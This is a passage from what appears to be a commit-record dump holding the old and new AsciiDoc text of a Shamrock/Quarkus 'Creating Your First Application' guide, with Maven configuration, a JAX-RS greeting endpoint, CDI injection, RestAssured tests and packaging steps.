Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Shamrock app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend you to follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone https:\/\/github.com\/protean-project\/quickstarts.git`, or download an https:\/\/github.com\/protean-project\/quickstarts\/archive\/master.zip[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Creating the pom file\n\nIn your favorite IDE, create a new Maven project.\nIt should generate a `pom.xml` file with a content similar to:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project>\n <modelVersion>4.0.0<\/modelVersion>\n\n <groupId>org.acme<\/groupId>\n <artifactId>shamrock-quickstart<\/artifactId>\n <version>1.0-SNAPSHOT<\/version>\n\n<\/project>\n----\n\nAdd the Shamrock Maven plugin to the `pom.xml` file:\n\n[source,xml,subs=attributes+]\n----\n<properties>\n <shamrock.version>{shamrock-version}<\/shamrock.version>\n <surefire.version>{surefire-version}<\/surefire.version>\n<\/properties>\n\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-bom<\/artifactId>\n <version>${shamrock.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-maven-plugin<\/artifactId>\n <version>${shamrock.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Shamrock?\n====\nShamrock can be seen as {project-name} core.\n====\n\nAs we are going to create a JAX-RS endpoint, you also need to add the following dependencies:\n\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-jaxrs-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-arc-deployment<\/artifactId>\n <\/dependency>\n<\/dependencies>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n== Creating the Application class\n\nIt's now time to create the `Application` class, create the `src\/main\/java\/org\/acme\/quickstart\/MyApplication.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.core.Application;\n\n@ApplicationPath(\"\/app\")\npublic class MyApplication extends Application {\n\n}\n----\n\n=== Creating the JAX-RS resource\n\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile shamrock:dev`:\n\n[source, text]\n----\n[INFO] --------------------< org.acme:shamrock-quickstart >--------------------\n[INFO] Building shamrock-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO] \n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ shamrock-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/opt\/source\/protean\/quickstarts\/getting-started\/src\/main\/resources\n[INFO] \n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ shamrock-quickstart ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO] \n[INFO] --- shamrock-maven-plugin:0.4.0:dev (default-cli) @ shamrock-quickstart ---\nINFO [o.j.s.u.r.UndertowDeploymentTemplate] (main) Starting Undertow on port 8080\nINFO [o.xnio] (main) XNIO version 3.6.5.Final\nINFO [o.x.nio] (main) XNIO NIO Implementation Version 3.6.5.Final\nINFO [o.j.threads] (main) JBoss Threads version 3.0.0.Alpha4\nINFO [o.j.s.d.ShamrockAugmentor] (main) Beginning shamrock augmentation\nINFO [o.j.s.d.ShamrockAugmentor] (main) Shamrock augmentation completed in 322ms\nINFO [o.j.r.r.i18n] (main) RESTEASY002225: Deploying javax.ws.rs.core.Application: class org.acme.quickstart.MyApplication\nINFO [o.j.shamrock] (main) Shamrock started in 697.982ms\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/app\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application.\n\n== Using injection\n\nLet's add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nStart the application and check that http:\/\/localhost:8080\/app\/hello\/greeting\/shamrock returns `hello shamrock`.\n\n\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nEdit the `pom.xml` file to add the 2 following dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-junit<\/artifactId>\n <version>${shamrock.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport org.jboss.shamrock.test.ShamrockTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@RunWith(ShamrockTest.class) \/\/ <1>\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"app\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"app\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `ShamrockTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `shamrock-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `shamrock-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _\u00fcber-jar_.\nIt embeds all the dependencies required to run the application.\n\nYou can run the application using: `java -jar target\/shamrock-quickstart-1.0-SNAPSHOT-runner.jar`\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the https:\/\/github.com\/protean-project\/quickstarts[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Shamrock.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","old_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Shamrock app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend you to follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone https:\/\/github.com\/protean-project\/quickstarts.git`, or download an https:\/\/github.com\/protean-project\/quickstarts\/archive\/master.zip[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Creating the pom file\n\nIn your favorite IDE, create a new Maven project.\nIt should generate a `pom.xml` file with a content similar to:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project>\n <modelVersion>4.0.0<\/modelVersion>\n\n <groupId>org.acme<\/groupId>\n <artifactId>shamrock-quickstart<\/artifactId>\n <version>1.0-SNAPSHOT<\/version>\n\n<\/project>\n----\n\nAdd the Shamrock Maven plugin to the `pom.xml` file:\n\n[source,xml,subs=attributes+]\n----\n<properties>\n <shamrock.version>{shamrock-version}<\/shamrock.version>\n <surefire.version>{surefire-version}<\/surefire.version>\n<\/properties>\n\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-bom<\/artifactId>\n <version>${shamrock.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-maven-plugin<\/artifactId>\n <version>${shamrock.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Shamrock?\n====\nShamrock can be seen as {project-name} core.\n====\n\nAs we are going to create a JAX-RS endpoint, you also need to add the following dependencies:\n\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-jaxrs-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-arc-deployment<\/artifactId>\n <\/dependency>\n<\/dependencies>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n== Creating the Application class\n\nIt's now time to create the `Application` class, create the `src\/main\/java\/org\/acme\/quickstart\/MyApplication.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.core.Application;\n\n@ApplicationPath(\"\/app\")\npublic class MyApplication extends Application {\n\n}\n----\n\n=== Creating the JAX-RS resource\n\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile shamrock:dev`:\n\n[source, text]\n----\n[INFO] --------------------< org.acme:shamrock-quickstart >--------------------\n[INFO] Building shamrock-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO] \n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ shamrock-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/opt\/source\/protean\/quickstarts\/getting-started\/src\/main\/resources\n[INFO] \n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ shamrock-quickstart ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO] \n[INFO] --- shamrock-maven-plugin:0.4.0:dev (default-cli) @ shamrock-quickstart ---\nINFO [o.j.s.u.r.UndertowDeploymentTemplate] (main) Starting Undertow on port 8080\nINFO [o.xnio] (main) XNIO version 3.6.5.Final\nINFO [o.x.nio] (main) XNIO NIO Implementation Version 3.6.5.Final\nINFO [o.j.threads] (main) JBoss Threads version 3.0.0.Alpha4\nINFO [o.j.s.d.ShamrockAugmentor] (main) Beginning shamrock augmentation\nINFO [o.j.s.d.ShamrockAugmentor] (main) Shamrock augmentation completed in 322ms\nINFO [o.j.r.r.i18n] (main) RESTEASY002225: Deploying javax.ws.rs.core.Application: class org.acme.quickstart.MyApplication\nINFO [o.j.shamrock] (main) Shamrock started in 697.982ms\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/app\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application.\n\n== Using injection\n\nLet's add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nStart the application and check that http:\/\/localhost:8080\/app\/hello\/greeting\/shamrock returns `hello shamrock`.\n\n\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nEdit the `pom.xml` file to add the 2 following dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-junit<\/artifactId>\n <version>${shamrock.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport org.jboss.shamrock.test.ShamrockTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@RunWith(ShamrockTest.class) \/\/ <1>\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"app\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"app\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `ShamrockTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `shamrock-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `shamrock-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _\u00fcber-jar_.\nIt embeds all the dependencies required to run the application.\n\nYou can run the application using: `java -jar target\/shamrock-quickstart-1.0-SNAPSHOT-runner.jar`\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the https:\/\/github.com\/protean-project\/quickstarts[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Shamrock.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9d9ae82aa52fd4424220855a2b0bf699203c1d5","subject":"Fix the quickstart jar name.","message":"Fix the quickstart jar name.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Quarkus app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Bootstrapping the project\n\nThe easiest way to create a new {project-name} project is to open a terminal and run the following command:\n\n[source, subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=getting-started \\\n -DclassName=\"org.acme.quickstart.GreetingResource\" \\\n -Dpath=\"\/hello\"\n----\n\nIt generates:\n\n* the Maven structure\n* an `org.acme.quickstart.GreetingResource` resource exposed on `\/hello`\n* an associated unit test\n* a landing page accessible on `http:\/\/localhost:8080`\n* an example of `Dockerfile`\n* the application configuration file\n\nOnce generated, look at the `pom.xml`.\nYou will find the import of the Quarkus BOM, allowing to omit the version on the different {project-name} dependencies.\nIn addition, you can see the `quarkus-maven-plugin` responsible of the packaging of the application and also providing the development mode.\n\n[source,xml,subs=attributes+]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-bom<\/artifactId>\n <version>${quarkus.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Quarkus?\n====\nQuarkus can be seen as {project-name} core.\n====\n\nIf we focus on the dependencies section, you can see 2 extensions allowing the development of REST applications:\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-arc-deployment<\/artifactId>\n <\/dependency>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n=== The JAX-RS resources\n\nDuring the project creation, the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file has been created with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIt's a very simple REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Differences with vanilla Jax-RS\n====\nWith Quarkus no need to create an `Application` class. It's supported but not required. In addition, only one instance\nof the resource is created and not one per request. You can configure this using the different `XScoped` annotations.\n====\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile quarkus:dev`:\n\n[source, bash]\n----\n[INFO] --------------------< org.acme:quarkus-quickstart >---------------------\n[INFO] Building quarkus-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ quarkus-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/src\/main\/resources\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ quarkus-quickstart ---\n[INFO] Changes detected - recompiling the module!\n[INFO] Compiling 2 source files to \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/target\/classes\n[INFO]\n[INFO] --- quarkus-maven-plugin:1.0.0.Alpha1-SNAPSHOT:dev (default-cli) @ quarkus-quickstart ---\nListening for transport dt_socket at address: 5005\n2019-02-28 17:05:22,347 INFO [io.qua.dep.QuarkusAugmentor] (main) Beginning quarkus augmentation\n2019-02-28 17:05:22,635 INFO [io.qua.dep.QuarkusAugmentor] (main) Quarkus augmentation completed in 288ms\n2019-02-28 17:05:22,770 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.668s. Listening on: http:\/\/localhost:8080\n2019-02-28 17:05:22,771 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, but you can also keep it running and enjoy the blasting fast hot-reload.\n\n== Using injection\n\nLet's modify the application and add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIf you stopped the application, restart the application with `mvn compile quarkus:dev`.\nThen check that http:\/\/localhost:8080\/hello\/greeting\/quarkus returns `hello quarkus`.\n\n== Development Mode\n\n`quarkus:dev` runs Quarkus in development mode. This enables hot deployment with background compilation, which means\nthat when you modify your Java files and refresh your browser these changes will automatically take effect. The act of\nrefreshing the browser triggers a scan of the workspace, and if any changes are detected the Java files are compiled,\nand the application is redeployed, then your request is serviced by the redeployed application. If there are any issues\nwith compilation or deployment an error page will let you know.\n\nThis will also listen for a debugger on port `5005`. If your want to wait for the debugger to attach before running you\ncan pass `-Ddebug` on the command line. If you don't want the debugger at all you can use `-Ddebug=false`.\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nIn the generated `pom.xml` file, you can see 2 test dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <version>${quarkus.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nQuarkus supports https:\/\/junit.org\/junit4\/[Junit 4] and https:\/\/junit.org\/junit5\/[Junit 5] tests.\nIn the generated project, we use Junit 5.\nBecause of this, the version of the https:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/[Surefire Maven Plugin] must\nbe set, as the default version does not support Junit 5:\n\n[source,xml,subs=attributes+]\n----\n<plugin>\n <artifactId>maven-surefire-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <configuration>\n <systemProperties>\n <java.util.logging.manager>org.jboss.logmanager.LogManager<\/java.util.logging.manager>\n <\/systemProperties>\n <\/configuration>\n<\/plugin>\n----\n\nWe also set the `java.util.logging` system property to make sure tests will use the correct logmanager.\n\nThe generated project contains a simple test.\nEdit the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` to match the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test \/\/ <1>\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `QuarkusTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\nBy default tests will run on port `8081` so as not to conflict with the running application. We automatically\nconfigure RestAssured to use this port. If you want to use a different client you should use the `@TestHTTPResource`\nannotation to directly inject the URL of the test into a field on the test class. This field can be of the type\n`String`, `URL` or `URI`. This annotation can also be given a value for the test path. For example if I want to test\na Servlet mapped to 